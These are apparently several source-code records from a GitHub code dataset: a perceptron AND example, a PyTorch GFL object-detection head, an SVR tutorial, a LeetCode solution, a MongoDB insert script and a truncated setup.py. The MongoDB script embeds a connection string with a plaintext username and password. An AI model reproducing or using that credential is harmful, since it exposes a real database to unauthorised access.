xx1=(x1.dot(w)+b).argmax()\n xx2=(x2.dot(w)+b).argmax()\n xx3=(x3.dot(w)+b).argmax()\n xx4=(x4.dot(w)+b).argmax()\n\n #print(xx1,xx2,xx3,xx4)\n if xx1==0 and xx2==0 and xx3==0 and xx4==1:\n #and의 연산의 결과와 일치하면 반복문 종료\n break\n\n print(\"[0,0] : \",xx1)\n print(\"[0,1] : \",xx2)\n print(\"[1,0] : \",xx3)\n print(\"[1,1] : \",xx4)\n print(\"W:\",w)\n print(\"b:\",b)\n\n\nif __name__ == '__main__':\n main()","repo_name":"hayoungishere/AI_Bigdata","sub_path":"BigData_course/and_op.py","file_name":"and_op.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"16076280759","text":"# !/usr/bin/env python\r\n# -- coding: utf-8 --\r\n# @Time : 2021/3/29 9:03\r\n# @Author : liumin\r\n# @File : gfl_head.py\r\n\r\nfrom functools import partial\r\nimport torch\r\nimport torch.nn as nn\r\nimport torch.nn.functional as F\r\nimport torch.distributed as dist\r\nimport numpy as np\r\nfrom ..assigners.atss import ATSS\r\nfrom ..modules.scales import Scale\r\nfrom ..modules.convs import ConvModule\r\nfrom ..modules.init_weights import normal_init\r\nfrom ..modules.nms import multiclass_nms\r\nfrom ...losses.det.general_focal_losses import QualityFocalLoss, DistributionFocalLoss\r\nfrom ...losses.det.iou_losses import GIoULoss, bbox_overlaps\r\n\r\n\r\ndef multi_apply(func, *args, **kwargs):\r\n pfunc = partial(func, **kwargs) if kwargs else func\r\n map_results = map(pfunc, *args)\r\n return tuple(map(list, zip(*map_results)))\r\n\r\n\r\ndef images_to_levels(target, num_level_anchors):\r\n \"\"\"Convert targets by image to targets by feature level.\r\n [target_img0, target_img1] -> [target_level0, target_level1, ...]\r\n \"\"\"\r\n target = torch.stack(target, 0)\r\n level_targets = []\r\n start = 0\r\n for n in num_level_anchors:\r\n end = start + n\r\n level_targets.append(target[:, start:end].squeeze(0))\r\n start = end\r\n return level_targets\r\n\r\n\r\ndef distance2bbox(points, distance, max_shape=None):\r\n \"\"\"Decode distance prediction to bounding box.\r\n Args:\r\n points (Tensor): Shape (n, 2), [x, y].\r\n distance (Tensor): Distance from the given point to 4\r\n boundaries (left, top, right, bottom).\r\n max_shape (tuple): Shape of the image.\r\n Returns:\r\n Tensor: Decoded bboxes.\r\n \"\"\"\r\n x1 = points[:, 0] - distance[:, 0]\r\n y1 = points[:, 1] - distance[:, 1]\r\n x2 = points[:, 0] + distance[:, 2]\r\n y2 = points[:, 1] + distance[:, 3]\r\n if max_shape is not None:\r\n x1 = x1.clamp(min=0, max=max_shape[1])\r\n y1 = y1.clamp(min=0, max=max_shape[0])\r\n x2 = x2.clamp(min=0, max=max_shape[1])\r\n y2 = y2.clamp(min=0, max=max_shape[0])\r\n return torch.stack([x1, y1, x2, y2], -1)\r\n\r\n\r\ndef bbox2distance(points, bbox, max_dis=None, eps=0.1):\r\n \"\"\"Decode bounding box based on distances.\r\n Args:\r\n points (Tensor): Shape (n, 2), [x, y].\r\n bbox (Tensor): Shape (n, 4), \"xyxy\" format\r\n max_dis (float): Upper bound of the distance.\r\n eps (float): a small value to ensure target < max_dis, instead <=\r\n Returns:\r\n Tensor: Decoded distances.\r\n \"\"\"\r\n left = points[:, 0] - bbox[:, 0]\r\n top = points[:, 1] - bbox[:, 1]\r\n right = bbox[:, 2] - points[:, 0]\r\n bottom = bbox[:, 3] - points[:, 1]\r\n if max_dis is not None:\r\n left = left.clamp(min=0, max=max_dis - eps)\r\n top = top.clamp(min=0, max=max_dis - eps)\r\n right = right.clamp(min=0, max=max_dis - eps)\r\n bottom = bottom.clamp(min=0, max=max_dis - eps)\r\n return torch.stack([left, top, right, bottom], -1)\r\n\r\n\r\ndef distance2bbox_plus(points, distance, max_shape=None):\r\n \"\"\"Decode distance prediction to bounding box.\r\n\r\n Args:\r\n points (Tensor): Shape (n, 2), [x, y].\r\n distance (Tensor): Distance from the given point to 4\r\n boundaries (left, top, right, bottom).\r\n max_shape (tuple): Shape of the image.\r\n\r\n Returns:\r\n Tensor: Decoded bboxes.\r\n \"\"\"\r\n x1 = points[..., 0] - distance[..., 0]\r\n y1 = points[..., 1] - distance[..., 1]\r\n x2 = points[..., 0] + distance[..., 2]\r\n y2 = points[..., 1] + distance[..., 3]\r\n if max_shape is not None:\r\n x1 = x1.clamp(min=0, max=max_shape[1])\r\n y1 = y1.clamp(min=0, max=max_shape[0])\r\n x2 = x2.clamp(min=0, max=max_shape[1])\r\n y2 = y2.clamp(min=0, max=max_shape[0])\r\n return torch.stack([x1, y1, x2, y2], -1)\r\n\r\n\r\ndef reduce_mean(tensor):\r\n if not (dist.is_available() and dist.is_initialized()):\r\n return tensor\r\n tensor = tensor.clone()\r\n dist.all_reduce(tensor.true_divide(dist.get_world_size()), op=dist.ReduceOp.SUM)\r\n return tensor\r\n\r\n\r\nclass Integral(nn.Module):\r\n \"\"\"A fixed layer for calculating integral result from distribution.\r\n This layer calculates the target location by :math: `sum{P(y_i) * y_i}`,\r\n P(y_i) denotes the softmax vector that represents the discrete distribution\r\n y_i denotes the discrete set, usually {0, 1, 2, ..., reg_max}\r\n Args:\r\n reg_max (int): The maximal value of the discrete set. Default: 16. You\r\n may want to reset it according to your new dataset or related\r\n settings.\r\n \"\"\"\r\n\r\n def __init__(self, reg_max=16):\r\n super(Integral, self).__init__()\r\n self.reg_max = reg_max\r\n self.register_buffer('project',\r\n torch.linspace(0, self.reg_max, self.reg_max + 1))\r\n\r\n def forward(self, x):\r\n \"\"\"Forward feature from the regression head to get integral result of\r\n bounding box location.\r\n Args:\r\n x (Tensor): Features of the regression head, shape (N, 4*(n+1)),\r\n n is self.reg_max.\r\n Returns:\r\n x (Tensor): Integral result of box locations, i.e., distance\r\n offsets from the box center in four directions, shape (N, 4).\r\n \"\"\"\r\n x = F.softmax(x.reshape(-1, self.reg_max + 1), dim=1)\r\n x = F.linear(x, self.project.type_as(x)).reshape(-1, 4)\r\n return x\r\n\r\n\r\nclass GFLHead(nn.Module):\r\n \"\"\"Generalized Focal Loss: Learning Qualified and Distributed Bounding\r\n Boxes for Dense Object Detection.\r\n GFL head structure is similar with ATSS, however GFL uses\r\n 1) joint representation for topformer and localization quality, and\r\n 2) flexible General distribution for bounding box locations,\r\n which are supervised by\r\n Quality Focal Loss (QFL) and Distribution Focal Loss (DFL), respectively\r\n https://arxiv.org/abs/2006.04388\r\n :param num_classes: Number of categories excluding the background category.\r\n :param loss: Config of all loss functions.\r\n :param input_channel: Number of channels in the input feature map.\r\n :param feat_channels: Number of conv layers in cls and reg tower. Default: 4.\r\n :param stacked_convs: Number of conv layers in cls and reg tower. Default: 4.\r\n :param octave_base_scale: Scale factor of grid cells.\r\n :param strides: Down sample strides of all level feature map\r\n :param conv_cfg: Dictionary to construct and config conv layer. Default: None.\r\n :param norm_cfg: Dictionary to construct and config norm layer.\r\n :param reg_max: Max value of integral set :math: `{0, ..., reg_max}`\r\n in QFL setting. Default: 16.\r\n :param kwargs:\r\n \"\"\"\r\n def __init__(self,\r\n num_classes,\r\n loss,\r\n input_channel,\r\n feat_channels=256,\r\n stacked_convs=4,\r\n octave_base_scale=4,\r\n strides=[8, 16, 32],\r\n conv_cfg=None,\r\n norm_cfg=dict(type='GN', num_groups=32, requires_grad=True),\r\n reg_max=16,\r\n **kwargs):\r\n super(GFLHead, self).__init__()\r\n self.num_classes = num_classes\r\n self.in_channels = input_channel\r\n self.feat_channels = feat_channels\r\n self.stacked_convs = stacked_convs\r\n self.grid_cell_scale = octave_base_scale\r\n self.strides = strides\r\n self.reg_max = reg_max\r\n\r\n self.loss_cfg = loss\r\n self.conv_cfg = conv_cfg\r\n self.norm_cfg = norm_cfg\r\n self.cls_out_channels = num_classes\r\n\r\n self.assigner = ATSS(topk=9)\r\n self.distribution_project = Integral(self.reg_max)\r\n\r\n self.loss_qfl = QualityFocalLoss(beta=self.loss_cfg[\"loss_qfl\"][\"beta\"],\r\n loss_weight=self.loss_cfg[\"loss_qfl\"][\"loss_weight\"])\r\n self.loss_dfl = DistributionFocalLoss(loss_weight=self.loss_cfg[\"loss_dfl\"][\"loss_weight\"])\r\n self.loss_bbox = GIoULoss(loss_weight=self.loss_cfg[\"loss_bbox\"][\"loss_weight\"])\r\n self._init_layers()\r\n self.init_weights()\r\n\r\n def _init_layers(self):\r\n self.relu = nn.ReLU(inplace=True)\r\n self.cls_convs = nn.ModuleList()\r\n self.reg_convs = nn.ModuleList()\r\n for i in range(self.stacked_convs):\r\n chn = self.in_channels if i == 0 else self.feat_channels\r\n self.cls_convs.append(\r\n ConvModule(\r\n chn,\r\n self.feat_channels,\r\n 3,\r\n stride=1,\r\n padding=1,\r\n conv_cfg=self.conv_cfg,\r\n norm_cfg=self.norm_cfg))\r\n self.reg_convs.append(\r\n ConvModule(\r\n chn,\r\n self.feat_channels,\r\n 3,\r\n stride=1,\r\n padding=1,\r\n conv_cfg=self.conv_cfg,\r\n norm_cfg=self.norm_cfg))\r\n self.gfl_cls = nn.Conv2d(\r\n self.feat_channels,\r\n self.cls_out_channels,\r\n 3,\r\n padding=1)\r\n self.gfl_reg = nn.Conv2d(\r\n self.feat_channels, 4 * (self.reg_max + 1), 3, padding=1)\r\n self.scales = nn.ModuleList([Scale(1.0) for _ in self.strides])\r\n\r\n def init_weights(self):\r\n for m in self.cls_convs:\r\n normal_init(m.conv, std=0.01)\r\n for m in self.reg_convs:\r\n normal_init(m.conv, std=0.01)\r\n bias_cls = -4.595\r\n normal_init(self.gfl_cls, std=0.01, bias=bias_cls)\r\n normal_init(self.gfl_reg, std=0.01)\r\n\r\n def forward(self, feats):\r\n return multi_apply(self.forward_single, feats, self.scales)\r\n\r\n def forward_single(self, x, scale):\r\n cls_feat = x\r\n reg_feat = x\r\n for cls_conv in self.cls_convs:\r\n cls_feat = cls_conv(cls_feat)\r\n for reg_conv in self.reg_convs:\r\n reg_feat = reg_conv(reg_feat)\r\n cls_score = self.gfl_cls(cls_feat)\r\n bbox_pred = scale(self.gfl_reg(reg_feat)).float()\r\n return cls_score, bbox_pred\r\n\r\n def loss(self, preds, gt_meta):\r\n cls_scores, bbox_preds = preds\r\n batch_size = cls_scores[0].shape[0]\r\n device = cls_scores[0].device\r\n # gt_bboxes = gt_meta['gt_bboxes']\r\n # gt_labels = gt_meta['gt_labels']\r\n gt_bboxes = gt_meta['boxes']\r\n gt_labels = gt_meta['labels']\r\n gt_bboxes_ignore = None\r\n\r\n featmap_sizes = [featmap.size()[-2:] for featmap in cls_scores]\r\n\r\n cls_reg_targets = self.target_assign(batch_size, featmap_sizes, gt_bboxes,\r\n gt_bboxes_ignore, gt_labels, device=device)\r\n if cls_reg_targets is None:\r\n return None\r\n\r\n (grid_cells_list, labels_list, label_weights_list, bbox_targets_list,\r\n bbox_weights_list, num_total_pos, num_total_neg) = cls_reg_targets\r\n\r\n num_total_samples = reduce_mean(\r\n torch.tensor(num_total_pos).cuda()).item()\r\n num_total_samples = max(num_total_samples, 1.0)\r\n\r\n losses_qfl, losses_bbox, losses_dfl, \\\r\n avg_factor = multi_apply(\r\n self.loss_single,\r\n grid_cells_list,\r\n cls_scores,\r\n bbox_preds,\r\n labels_list,\r\n label_weights_list,\r\n bbox_targets_list,\r\n self.strides,\r\n num_total_samples=num_total_samples)\r\n\r\n avg_factor = sum(avg_factor)\r\n avg_factor = reduce_mean(avg_factor).item()\r\n if avg_factor <= 0:\r\n loss_qfl = torch.tensor(0, dtype=torch.float32, requires_grad=True).cuda()\r\n loss_bbox = torch.tensor(0, dtype=torch.float32, requires_grad=True).cuda()\r\n loss_dfl = torch.tensor(0, dtype=torch.float32, requires_grad=True).cuda()\r\n else:\r\n losses_bbox = list(map(lambda x: x / avg_factor, losses_bbox))\r\n losses_dfl = list(map(lambda x: x / avg_factor, losses_dfl))\r\n\r\n loss_qfl = sum(losses_qfl)\r\n loss_bbox = sum(losses_bbox)\r\n loss_dfl = sum(losses_dfl)\r\n\r\n loss = loss_qfl + loss_bbox + loss_dfl\r\n loss_states = dict(\r\n loss_qfl=loss_qfl,\r\n loss_bbox=loss_bbox,\r\n loss_dfl=loss_dfl)\r\n\r\n return loss, loss_states\r\n\r\n def loss_single(self, grid_cells, cls_score, bbox_pred, labels,\r\n label_weights, bbox_targets, stride, num_total_samples):\r\n\r\n grid_cells = grid_cells.reshape(-1, 4)\r\n cls_score = cls_score.permute(0, 2, 3,\r\n 1).reshape(-1, self.cls_out_channels)\r\n bbox_pred = bbox_pred.permute(0, 2, 3, 1).reshape(-1, 4 * (self.reg_max + 1))\r\n bbox_targets = bbox_targets.reshape(-1, 4)\r\n labels = labels.reshape(-1)\r\n label_weights = label_weights.reshape(-1)\r\n\r\n # FG cat_id: [0, num_classes -1], BG cat_id: num_classes\r\n bg_class_ind = self.num_classes\r\n pos_inds = torch.nonzero((labels >= 0)\r\n & (labels < bg_class_ind), as_tuple=False).squeeze(1)\r\n\r\n score = label_weights.new_zeros(labels.shape)\r\n\r\n if len(pos_inds) > 0:\r\n pos_bbox_targets = bbox_targets[pos_inds]\r\n pos_bbox_pred = bbox_pred[pos_inds] # (n, 4 * (reg_max + 1))\r\n pos_grid_cells = grid_cells[pos_inds]\r\n pos_grid_cell_centers = self.grid_cells_to_center(pos_grid_cells) / stride\r\n\r\n weight_targets = cls_score.detach().sigmoid()\r\n weight_targets = weight_targets.max(dim=1)[0][pos_inds]\r\n pos_bbox_pred_corners = self.distribution_project(pos_bbox_pred)\r\n pos_decode_bbox_pred = distance2bbox(pos_grid_cell_centers,\r\n pos_bbox_pred_corners)\r\n pos_decode_bbox_targets = pos_bbox_targets / stride\r\n score[pos_inds] = bbox_overlaps(\r\n pos_decode_bbox_pred.detach(),\r\n pos_decode_bbox_targets,\r\n is_aligned=True)\r\n pred_corners = pos_bbox_pred.reshape(-1, self.reg_max + 1)\r\n target_corners = bbox2distance(pos_grid_cell_centers,\r\n pos_decode_bbox_targets,\r\n self.reg_max).reshape(-1)\r\n\r\n # regression loss\r\n loss_bbox = self.loss_bbox(\r\n pos_decode_bbox_pred,\r\n pos_decode_bbox_targets,\r\n weight=weight_targets,\r\n avg_factor=1.0)\r\n\r\n # dfl loss\r\n loss_dfl = self.loss_dfl(\r\n pred_corners,\r\n target_corners,\r\n weight=weight_targets[:, None].expand(-1, 4).reshape(-1),\r\n avg_factor=4.0)\r\n else:\r\n loss_bbox = bbox_pred.sum() * 0\r\n loss_dfl = bbox_pred.sum() * 0\r\n weight_targets = torch.tensor(0).cuda()\r\n\r\n # qfl loss\r\n loss_qfl = self.loss_qfl(\r\n cls_score, (labels, score),\r\n weight=label_weights,\r\n avg_factor=num_total_samples)\r\n\r\n return loss_qfl, loss_bbox, loss_dfl, weight_targets.sum()\r\n\r\n def target_assign(self,\r\n batch_size,\r\n featmap_sizes,\r\n gt_bboxes_list,\r\n gt_bboxes_ignore_list,\r\n gt_labels_list,\r\n device):\r\n \"\"\"\r\n Assign target for a batch of images.\r\n :param batch_size: num of images in one batch\r\n :param featmap_sizes: A list of all grid cell boxes in all image\r\n :param gt_bboxes_list: A list of ground truth boxes in all image\r\n :param gt_bboxes_ignore_list: A list of all ignored boxes in all image\r\n :param gt_labels_list: A list of all ground truth label in all image\r\n :param device: pytorch device\r\n :return: Assign results of all images.\r\n \"\"\"\r\n # get grid cells of one image\r\n multi_level_grid_cells = [\r\n self.get_grid_cells(featmap_sizes[i],\r\n self.grid_cell_scale,\r\n stride,\r\n dtype=torch.float32,\r\n device=device) for i, stride in enumerate(self.strides)\r\n ]\r\n mlvl_grid_cells_list = [multi_level_grid_cells for i in range(batch_size)]\r\n\r\n # pixel cell number of multi-level feature maps\r\n num_level_cells = [grid_cells.size(0) for grid_cells in mlvl_grid_cells_list[0]]\r\n num_level_cells_list = [num_level_cells] * batch_size\r\n # concat all level cells and to a single tensor\r\n for i in range(batch_size):\r\n mlvl_grid_cells_list[i] = torch.cat(mlvl_grid_cells_list[i])\r\n # compute targets for each image\r\n if gt_bboxes_ignore_list is None:\r\n gt_bboxes_ignore_list = [None for _ in range(batch_size)]\r\n if gt_labels_list is None:\r\n gt_labels_list = [None for _ in range(batch_size)]\r\n # target assign on all images, get list of tensors\r\n # list length = batch size\r\n # tensor first dim = num of all grid cell\r\n (all_grid_cells, all_labels, all_label_weights, all_bbox_targets,\r\n all_bbox_weights, pos_inds_list, neg_inds_list) = multi_apply(\r\n self.target_assign_single_img,\r\n mlvl_grid_cells_list,\r\n num_level_cells_list,\r\n gt_bboxes_list,\r\n gt_bboxes_ignore_list,\r\n gt_labels_list)\r\n # no valid cells\r\n if any([labels is None for labels in all_labels]):\r\n return None\r\n # sampled cells of all images\r\n num_total_pos = sum([max(inds.numel(), 1) for inds in pos_inds_list])\r\n num_total_neg = sum([max(inds.numel(), 1) for inds in neg_inds_list])\r\n # merge list of targets tensors into one batch then split to multi levels\r\n mlvl_grid_cells = images_to_levels(all_grid_cells, num_level_cells)\r\n mlvl_labels = images_to_levels(all_labels, num_level_cells)\r\n mlvl_label_weights = images_to_levels(all_label_weights, num_level_cells)\r\n mlvl_bbox_targets = images_to_levels(all_bbox_targets, num_level_cells)\r\n mlvl_bbox_weights = images_to_levels(all_bbox_weights, num_level_cells)\r\n return (mlvl_grid_cells, mlvl_labels, mlvl_label_weights,\r\n mlvl_bbox_targets, mlvl_bbox_weights, num_total_pos,\r\n num_total_neg)\r\n\r\n def target_assign_single_img(self,\r\n grid_cells,\r\n num_level_cells,\r\n gt_bboxes,\r\n gt_bboxes_ignore,\r\n gt_labels):\r\n \"\"\"\r\n Using ATSS Assigner to assign target on one image.\r\n :param grid_cells: Grid cell boxes of all pixels on feature map\r\n :param num_level_cells: numbers of grid cells on each level's feature map\r\n :param gt_bboxes: Ground truth boxes\r\n :param gt_bboxes_ignore: Ground truths which are ignored\r\n :param gt_labels: Ground truth labels\r\n :return: Assign results of a single image\r\n \"\"\"\r\n device = grid_cells.device\r\n # gt_bboxes = torch.from_numpy(gt_bboxes).to(device)\r\n # gt_labels = torch.from_numpy(gt_labels).to(device)\r\n\r\n assign_result = self.assigner.assign(grid_cells, num_level_cells, gt_bboxes, gt_bboxes_ignore, gt_labels)\r\n\r\n pos_inds, neg_inds, pos_gt_bboxes, pos_assigned_gt_inds = \\\r\n self.sample(assign_result, gt_bboxes)\r\n\r\n num_cells = grid_cells.shape[0]\r\n bbox_targets = torch.zeros_like(grid_cells)\r\n bbox_weights = torch.zeros_like(grid_cells)\r\n labels = grid_cells.new_full((num_cells,),\r\n self.num_classes,\r\n dtype=torch.long)\r\n label_weights = grid_cells.new_zeros(num_cells, dtype=torch.float)\r\n\r\n if len(pos_inds) > 0:\r\n pos_bbox_targets = pos_gt_bboxes\r\n bbox_targets[pos_inds, :] = pos_bbox_targets\r\n bbox_weights[pos_inds, :] = 1.0\r\n if gt_labels is None:\r\n # Only rpn gives gt_labels as None\r\n # Foreground is the first class\r\n labels[pos_inds] = 0\r\n else:\r\n labels[pos_inds] = gt_labels[pos_assigned_gt_inds]\r\n\r\n label_weights[pos_inds] = 1.0\r\n if len(neg_inds) > 0:\r\n label_weights[neg_inds] = 1.0\r\n\r\n return (grid_cells, labels, label_weights, bbox_targets, bbox_weights,\r\n pos_inds, neg_inds)\r\n\r\n def sample(self, assign_result, gt_bboxes):\r\n pos_inds = torch.nonzero(\r\n assign_result.gt_inds > 0, as_tuple=False).squeeze(-1).unique()\r\n neg_inds = torch.nonzero(\r\n assign_result.gt_inds == 0, as_tuple=False).squeeze(-1).unique()\r\n pos_assigned_gt_inds = assign_result.gt_inds[pos_inds] - 1\r\n\r\n if gt_bboxes.numel() == 0:\r\n # hack for index error case\r\n assert pos_assigned_gt_inds.numel() == 0\r\n pos_gt_bboxes = torch.empty_like(gt_bboxes).view(-1, 4)\r\n else:\r\n if len(gt_bboxes.shape) < 2:\r\n gt_bboxes = gt_bboxes.view(-1, 4)\r\n pos_gt_bboxes = gt_bboxes[pos_assigned_gt_inds, :]\r\n return pos_inds, neg_inds, pos_gt_bboxes, pos_assigned_gt_inds\r\n\r\n def post_process(self, preds, imgs):\r\n cls_scores, bbox_preds = preds\r\n result_list = self.get_bboxes(cls_scores, bbox_preds, imgs)\r\n return result_list\r\n\r\n def get_bboxes(self,\r\n cls_scores,\r\n bbox_preds,\r\n imgs,\r\n rescale=False):\r\n\r\n assert len(cls_scores) == len(bbox_preds)\r\n num_levels = len(cls_scores)\r\n device = cls_scores[0].device\r\n\r\n input_height, input_width = imgs.shape[2:]\r\n input_shape = [input_height, input_width]\r\n\r\n result_list = []\r\n for img_id in range(cls_scores[0].shape[0]):\r\n cls_score_list = [\r\n cls_scores[i][img_id].detach() for i in range(num_levels)\r\n ]\r\n bbox_pred_list = [\r\n bbox_preds[i][img_id].detach() for i in range(num_levels)\r\n ]\r\n scale_factor = 1\r\n dets = self.get_bboxes_single(cls_score_list, bbox_pred_list,\r\n input_shape, scale_factor,\r\n device, rescale)\r\n\r\n result_list.append(dets)\r\n return result_list\r\n\r\n def get_bboxes_single(self,\r\n cls_scores,\r\n bbox_preds,\r\n img_shape,\r\n scale_factor,\r\n device,\r\n rescale=False):\r\n \"\"\"\r\n Decode output tensors to bboxes on one image.\r\n :param cls_scores: topformer prediction tensors of all stages\r\n :param bbox_preds: regression prediction tensors of all stages\r\n :param img_shape: shape of input image\r\n :param scale_factor: scale factor of boxes\r\n :param device: device of the tensor\r\n :return: predict boxes and labels\r\n \"\"\"\r\n assert len(cls_scores) == len(bbox_preds)\r\n mlvl_bboxes = []\r\n mlvl_scores = []\r\n for stride, cls_score, bbox_pred in zip(\r\n self.strides, cls_scores, bbox_preds):\r\n assert cls_score.size()[-2:] == bbox_pred.size()[-2:]\r\n featmap_size = cls_score.size()[-2:]\r\n y, x = self.get_single_level_center_point(\r\n featmap_size, stride, cls_score.dtype, device, flatten=True)\r\n center_points = torch.stack([x, y], dim=-1)\r\n scores = cls_score.permute(1, 2, 0).reshape(\r\n -1, self.cls_out_channels).sigmoid()\r\n bbox_pred = bbox_pred.permute(1, 2, 0)\r\n bbox_pred = self.distribution_project(bbox_pred) * stride\r\n\r\n nms_pre = 1000\r\n if scores.shape[0] > nms_pre:\r\n max_scores, _ = scores.max(dim=1)\r\n _, topk_inds = max_scores.topk(nms_pre)\r\n center_points = center_points[topk_inds, :]\r\n bbox_pred = bbox_pred[topk_inds, :]\r\n scores = scores[topk_inds, :]\r\n\r\n bboxes = distance2bbox(center_points, bbox_pred,\r\n max_shape=img_shape)\r\n mlvl_bboxes.append(bboxes)\r\n mlvl_scores.append(scores)\r\n\r\n mlvl_bboxes = torch.cat(mlvl_bboxes)\r\n if rescale:\r\n mlvl_bboxes /= mlvl_bboxes.new_tensor(scale_factor)\r\n\r\n mlvl_scores = torch.cat(mlvl_scores)\r\n # add a dummy background class at the end of all labels, same with mmdetection2.0\r\n padding = mlvl_scores.new_zeros(mlvl_scores.shape[0], 1)\r\n mlvl_scores = torch.cat([mlvl_scores, padding], dim=1)\r\n\r\n det_bboxes, det_labels = multiclass_nms(\r\n mlvl_bboxes,\r\n mlvl_scores,\r\n score_thr=0.05,\r\n nms_cfg=dict(type='nms', iou_threshold=0.6),\r\n max_num=100)\r\n return det_bboxes, det_labels\r\n\r\n def get_single_level_center_point(self, featmap_size, stride, dtype, device='cuda', flatten=True):\r\n \"\"\"\r\n Generate pixel centers of a single stage feature map.\r\n :param featmap_size: height and width of the feature map\r\n :param stride: down sample stride of the feature map\r\n :param dtype: data type of the tensors\r\n :param device: device of the tensors\r\n :param flatten: flatten the x and y tensors\r\n :return: y and x of the center points\r\n \"\"\"\r\n h, w = featmap_size\r\n x_range = (torch.arange(w, dtype=dtype, device=device) + 0.5) * stride\r\n y_range = (torch.arange(h, dtype=dtype, device=device) + 0.5) * stride\r\n y, x = torch.meshgrid(y_range, x_range, indexing='ij')\r\n if flatten:\r\n y = y.flatten()\r\n x = x.flatten()\r\n return y, x\r\n\r\n def get_grid_cells(self, featmap_size, scale, stride, dtype, device='cuda'):\r\n \"\"\"\r\n Generate grid cells of a feature map for target assignment.\r\n :param featmap_size: Size of a single level feature map.\r\n :param scale: Grid cell scale.\r\n :param stride: Down sample stride of the feature map.\r\n :param dtype: Data type of the tensors.\r\n :param device: Device of the tensors.\r\n :return: Grid_cells xyxy position. Size should be [feat_w * feat_h, 4]\r\n \"\"\"\r\n cell_size = stride * scale\r\n y, x = self.get_single_level_center_point(\r\n featmap_size, stride, dtype, device, flatten=True)\r\n grid_cells = torch.stack(\r\n [x - 0.5 * cell_size, y - 0.5 * cell_size,\r\n x + 0.5 * cell_size, y + 0.5 * cell_size], dim=-1\r\n )\r\n return grid_cells\r\n\r\n def grid_cells_to_center(self, grid_cells):\r\n \"\"\"\r\n Get center location of each gird cell\r\n :param grid_cells: grid cells of a feature map\r\n :return: center points\r\n \"\"\"\r\n cells_cx = (grid_cells[:, 2] + grid_cells[:, 0]) / 2\r\n cells_cy = (grid_cells[:, 3] + grid_cells[:, 1]) / 2\r\n return torch.stack([cells_cx, cells_cy], dim=-1)","repo_name":"shanglianlm0525/CvPytorch","sub_path":"src/models/heads/gfl_head.py","file_name":"gfl_head.py","file_ext":"py","file_size_in_byte":27559,"program_lang":"python","lang":"en","doc_type":"code","stars":183,"dataset":"github-code","pt":"60"} +{"seq_id":"34616123901","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.preprocessing import PolynomialFeatures\nfrom sklearn.metrics import r2_score # R-Square\n\n\ndf = pd.read_csv(\"data/salarys.csv\")\n\n\nx = df.iloc[:,1:2] # DataFrame\ny = df.iloc[:,2:]\nXn = x.values # Numpy array\nYn = y.values\n\n\n# SVR\n# Support Vector Regression | SVR | svr da scaling edilmesi mecbur. hassas bu konuda krdşimiz.\nfrom sklearn.preprocessing import StandardScaler\nsc1 = StandardScaler()\nx_scale = sc1.fit_transform(Xn)\nsc2 = StandardScaler()\ny_scale = np.ravel(sc2.fit_transform(Yn.reshape(-1,1)))\n\nfrom sklearn.svm import SVR\nsvr = SVR(kernel=\"rbf\") # Radial Based Function | rbf\nsvr.fit(x_scale, y_scale) # iki değer arasında bağlantı kurulması\n\nsvrPredict = svr.predict(x_scale)\nplt.scatter(x_scale, y_scale, color=\"red\")\nplt.plot(x_scale, svrPredict) # Her bir x değeri için tahminde bulun\nplt.show()\n\n\n# SVR ile tahmin etme | ölçeklenmeden dolayı düşük sayılar çıkıyor\nprint(svr.predict([[11]]))\nprint(svr.predict([[6.6]]))\n\n\n\n# R2\n# Scaling yaptığımız için boyutu indirmemiz gerek\nprint(\"SVR - R2\".center(50, \"-\"))\nprint(r2_score(y_scale, svr.predict(x_scale)))","repo_name":"mucahitcakmak/Python-MachineLearningAlgorithms","sub_path":"1-Prediction/5-SVR.py","file_name":"5-SVR.py","file_ext":"py","file_size_in_byte":1232,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"6268761332","text":"#https://leetcode.com/problems/to-lower-case/\n#Complexity: O(n)\n\nclass Solution:\n def toLowerCase(self, str: str) -> str:\n lenString=len(str)\n i=0\n for i in range(lenString):\n ordI=ord(str[i])\n if ordI>=65 and ordI<=90:\n str=str[:i]+chr(32+ordI)+str[i+1:]\n i+=1\n return str\n","repo_name":"aasthaagrawal/Algorithms_and_Data_Structures","sub_path":"leetcode/709_To_Lower_Case.py","file_name":"709_To_Lower_Case.py","file_ext":"py","file_size_in_byte":353,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"3403082888","text":"\nfrom pymongo.mongo_client import MongoClient\nuri = \"mongodb+srv://satyammarkam123:jacob@cluster0.fh8hexa.mongodb.net/?retryWrites=true&w=majority\"\n\n# Create a new client and connect to the server\nclient = MongoClient(uri)\n\n# Send a ping to confirm a successful connection\ndb = client['sample-db']\ncollection = db['sample']\ncar={\n 'id': 2,\n 'name': 'value2',\n 'class':'10nth'\n}\nresult = collection.insert_one(car) \nprint(result)\n\n","repo_name":"Satyam20091998/Spark-Kafka-MongoDB","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"40810158330","text":"import setuptools\n\nwith open(\"README.md\", \"r\") as fh:\n\tlong_description = fh.read()\n\nsetuptools.setup(\n\tname=\"pyDatahubDriver\",\n\tversion=\"0.1.1b\",\n\tauthor=\"King Abdullah Petroleum Studies and Research Center\",\n\tauthor_email=\"anup.kumar@kapsarc.org\",\n\tdescription=\"KAPSARC Datahub\",\n keywords=\"model-data data-version modelers-data-version python jupyter ipython\",\n install_requires=[\n \"pandas\",\n \"requests\"\n ],\n\tlong_description=long_description,\n\tlong_description_conent_type=\"text/markdown\",\n\t# url=\"https://github.com/kapsarc/pyDatahub\",\n\tpackages=['datahub'],\n\tpackage_dir={'datahub': 'datahub'},\n\tclassifiers=[\n\t\t'Development Status :: 2 - Pre-Alpha',\n \"Programming Language :: Python :: 3\",\n \"Programming Language :: Python :: 3.5\",\n \"Programming Language :: Python :: 3.6\",\n \"Programming Language :: Python :: 3.7\",\n\t\t\"License :: OSI Approved :: MIT License\",\n\t\t\"Operating System :: OS Independent\",\n \"Intended Audience :: Science/Research\",\n \"Intended Audience :: Developers\",\n \"Intended Audience :: Financial and Insurance Industry\",\n \"Intended Audience :: Healthcare 